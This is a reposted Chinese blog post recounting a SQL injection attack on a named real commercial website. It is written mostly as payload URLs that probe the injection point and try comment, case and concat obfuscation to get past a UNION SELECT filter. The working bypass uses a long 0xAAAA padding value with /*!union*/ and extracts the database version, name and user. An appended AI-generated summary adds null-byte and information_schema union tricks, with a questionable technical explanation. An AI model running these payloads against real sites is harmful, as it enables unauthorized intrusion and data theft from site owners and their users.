【转】突破sql 注入过滤Union+SELECT 继续射下去

前几今天遇到一个bt 的老外注射点:  

//*ps 此点目前流行的注射工具射不 *//  
http://cleopatra-sy.com/index.php?content=more_product&id=17  
  
http://cleopatra-sy.com/index.php?content=more_product&id=17 and 1=1  正常  
http://cleopatra-sy.com/index.php?content=more_product&id=17 and 1=2  报错  

http://cleopatra-sy.com/index.php?content=more_product&id=17 order by 6  正常  
http://cleopatra-sy.com/index.php?content=more_product&id=17 order by 7  错误  
                                                                                               
继续按照常规的手法注射:  
http://cleopatra-sy.com/index.php?content=more_product&id=-17+UNION+SELECT+1,2
3,4,5,6--

错误nnd,过滤 UNION+SELECT  我们来加点特殊的字符看看能不能绕过  
http://cleopatra-sy.com/index.php?content=more_product&id=-17+/**//**//*!uNiOn*//**/
/**//*!sElEcT*//**//**/1,2,3,4,5,6--  
  
                                                                                                          
悲剧还是绕不过去  - -,于是尝试自己知道的绕过方法继续射…  
http://cleopatra-sy.com/index.php?content=more_product&id=-17+/*U*//*n*//*i*//*o*//*n
*//*t*/+/*s*//*e*//*l*//*e*//*c*//*t*/+1,2,3,4,5,6--  
                                                                                               

http://cleopatra-sy.com/index.php?content=more_product&id=-17+concat(u,n,i,o,n)+conca
t(s,e,l,e,c,t)+all+1,2,3,4,5,6--  

悲剧还是绕不过去,nnd。找了几个朋友看了还是绕不过去邪恶的过滤啊。要是国内 
的站以上几种方法一般都能搞定,老外就是bt。最后实在木有办法了只好去国外的黑 
客论坛求助老外帮助。国外php 注射历史悠久手法独特+方法猥琐  射出几率相当高  
于是发帖求助了终于有一个黑客回帖了而且轻松的绕过去了。  
http://cleopatra-sy.com/index.php?content=more_product&id=-17   and   (select   1)=(select  
0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAA)+/*!union*/+select+1,2,3,4,5,6--+-  

靠,老外果然牛B 那么继续射  
http://cleopatra-sy.com/index.php?content=more_product&id=-17   and   (select   1)=(select  
0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAA)+/*!union*/+select+1,concat_ws(0x7c,version(),database(),u 
ser()),3,4,5,6--+-  
成功得到系统版本、当前数据库用户、用户名  

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入中,过滤select关键字是常见的安全措施之一。然而,有一些方法可以绕过这种过滤。一种方法是在过滤过滤的关键词前面加上URL编码的空字节%00。这是因为在C/C++中,空字节代表语句的结束,而SQL语句对空字节的解释则不同,它会继续执行后面的代码。因此,通过在select关键字前面加上%00,可以绕过过滤器的select关键字过滤\[2\]。 另外,还有一些其他的绕过方法可以用于绕过select关键字的过滤。例如,可以使用联合查询来绕过过滤器。通过在注入点处构造一个合法的联合查询语句,可以绕过select关键字的过滤,并执行自定义的SQL语句。例如,可以使用以下语句来绕过select关键字的过滤,并执行查询操作: ?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata --+ 这个语句使用了联合查询来获取数据库中的所有模式名称,并将结果以逗号分隔的形式返回\[3\]。 总结起来,绕过select关键字的过滤可以使用URL编码的空字节%00或者联合查询等方法。然而,需要注意的是,进行SQL注入攻击是非法的行为,应该遵守法律法规,不进行未经授权的测试或攻击。 #### 引用[.reference_title] - *1* *2* [SQL注入绕过关键词过滤的小技巧及原理(union select为例)](https://blog.csdn.net/weixin_54848371/article/details/120423529)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [sql注入原理](https://blog.csdn.net/xg_ren/article/details/79354364)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值